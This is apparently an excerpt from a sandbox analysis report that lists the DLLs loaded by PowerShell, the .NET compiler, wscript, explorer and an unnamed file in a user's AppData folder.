Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wihaduv	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
